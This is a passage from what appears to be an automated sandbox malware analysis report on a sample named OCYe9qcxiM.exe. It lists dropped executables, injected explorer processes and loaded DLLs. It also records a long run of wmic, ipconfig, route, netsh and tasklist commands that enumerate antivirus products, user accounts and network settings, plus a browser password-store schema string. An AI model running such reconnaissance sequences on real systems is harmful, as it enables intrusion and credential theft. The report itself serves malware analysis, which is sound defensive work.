                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;744&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;776&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;776&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;784&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;784&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;868&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;868&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;920&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;920&quot;::GetOwner
                  Source: C:\Windows\explorer.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543198734.000001B605D13000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543460011.000001B605D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT * FROM Win32_Productp#=:;
                  Source: ECAA.tmp.11.dr, EF9B.tmp.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: OCYe9qcxiM.exeReversingLabs: Detection: 36%
                  Source: unknownProcess created: C:\Users\user\Desktop\OCYe9qcxiM.exe "C:\Users\user\Desktop\OCYe9qcxiM.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\hehcrfb C:\Users\user\AppData\Roaming\hehcrfb
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4470.exe C:\Users\user\AppData\Local\Temp\4470.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\fihcrfb C:\Users\user\AppData\Roaming\fihcrfb
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\354F.exe C:\Users\user\AppData\Local\Temp\354F.exe
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeProcess created: C:\Windows\System32\cmd.exe cmd
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\hehcrfb C:\Users\user\AppData\Roaming\hehcrfb
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\fihcrfb C:\Users\user\AppData\Roaming\fihcrfb
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4470.exe C:\Users\user\AppData\Local\Temp\4470.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\354F.exe C:\Users\user\AppData\Local\Temp\354F.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: winscard.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
